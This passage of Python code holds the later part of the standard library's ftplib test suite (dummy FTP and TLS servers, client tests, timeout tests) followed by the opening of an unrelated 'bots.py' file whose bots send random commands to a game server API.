addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0)) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
ip = self.fake_pasv_server_ip
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0),
family=socket.AF_INET6) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET, encoding=DEFAULT_ENCODING):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
self.encoding = encoding
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn, encoding=self.encoding)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
socket = context.wrap_socket(self.socket,
suppress_ragged_eofs=False,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
DummyFTPHandler.__init__(self, conn, encoding=encoding)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyFTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode(self.client.encoding))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode(self.client.encoding))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_makepasv_issue43285_security_disabled(self):
"""Test the opt-in to the old vulnerable behavior."""
self.client.trust_server_pasv_ipv4_address = True
bad_host, port = self.client.makepasv()
self.assertEqual(
bad_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((self.client.sock.getpeername()[0], port),
timeout=TIMEOUT).close()
def test_makepasv_issue43285_security_enabled_default(self):
self.assertFalse(self.client.trust_server_pasv_ipv4_address)
trusted_host, port = self.client.makepasv()
self.assertNotEqual(
trusted_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((trusted_host, port), timeout=TIMEOUT).close()
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = socket_helper.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = socket_helper.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
def test_encoding_param(self):
encodings = ['latin-1', 'utf-8']
for encoding in encodings:
with self.subTest(encoding=encoding):
self.tearDown()
self.setUp(encoding=encoding)
self.assertEqual(encoding, self.client.encoding)
self.test_retrbinary()
self.test_storbinary()
self.test_retrlines()
new_dir = self.client.mkd('/non-ascii dir \xAE')
self.check_data(new_dir, '/non-ascii dir \xAE')
# Check default encoding
client = ftplib.FTP(timeout=TIMEOUT)
self.assertEqual(DEFAULT_ENCODING, client.encoding)
@skipUnless(socket_helper.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0),
af=socket.AF_INET6,
encoding=DEFAULT_ENCODING)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=DEFAULT_ENCODING)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
# consume from SSL socket to finalize handshake and avoid
# "SSLError [SSL] shutdown while in init"
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
@skipUnless(False, "FIXME: bpo-32706")
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = socket_helper.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.daemon = True
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.server_thread = None
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
# bpo-39259
with self.assertRaises(ValueError):
ftplib.FTP(HOST, timeout=0)
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def setUpModule():
thread_info = support.threading_setup()
unittest.addModuleCleanup(support.threading_cleanup, *thread_info)
if __name__ == '__main__':
unittest.main()
|
bots.py
|
import requests
import time
import abc
import random
import string
from multiprocessing import Process, Pipe
# functions to generate random json data for API requests
def GSIgen():
return {}
def accgen():
return {'x': random.randrange(-5,5), 'y':random.randrange(-5,5)}
def scangen():
return {'width':random.randrange(1,90),'direction':random.randrange(-345,456),'energy':random.randrange(1,10)}
def shootgen():
return {'width':random.randrange(1,90),'direction':random.randrange(-345,456),'energy':random.randrange(1,10),'damage':0.000001}
def shieldgen():
return {'width':random.randrange(1,180),'direction':random.randrange(-345,456)}
API = [ ['shoot', shootgen], ['scan', scangen], ['getShipInfo', GSIgen], ['accelerate', accgen], ['shield', shieldgen] ]
def randomAPI():
api = random.choice(API)
return api[0], api[1]()
class Bot:
def __init__(self,server):
self.host = server.host
self.port = server.port
resp = requests.post(url='http://' + self.host + ':' + str(self.port) + '/connect')
self.token = resp.json()['token']
self.apiCallTimes = {}
self.p = None
self.pipe = None
self.name = "Bot"
#def api(self, path, data):
# data['token'] = self.token
# return requests.post(url = 'http://' + self.host + ':' + str(port) + '/' + path, json=data)
def quit(self):
data = { 'token': self.token }
return requests.post(url = 'http://' + self.host + ':' + str(self.port) + '/disconnect', json=data)
def timedapi(self, path, data = {}):
data['token'] = self.token
start = time.time()
resp = requests.post(url = 'http://' + self.host + ':' + str(self.port) + '/' + path, json=data)
end = time.time()
if path not in self.apiCallTimes:
self.apiCallTimes[path] = []
self.apiCallTimes[path].append(end-start)
return (resp,end-start)
def generate_output(self,word="basic"):
return "I am a " + word + " bot and did nothing succesfully"
def run_inner(self, output, t = 3):
output.send(self.generate_output())
def run(self, t = 3):
self.pipe = Pipe()
self.p = Process(target=self.run_inner, args = (self.pipe[0],t,))
self.p.daemon = True
self.p.start()
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
#ignoring
assert self.pipe[1].recv()
return self.quit()
# just chills
class Idlebot(Bot):
def __init__(self, server):
super().__init__(server)
self.name = "Idlebot"
def run_inner(self, output, t = 3):
time.sleep(t)
output.send(self.generate_output('idle'))
# uses a random command {rate} times a second
class Randombot(Bot):
def __init__(self, server, rate = 3):
super().__init__(server)
self.rate = rate
self.name = 'Randombot'
def generate_output(self):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
calls = 0
start = time.time()
delay = 1.0 / self.rate
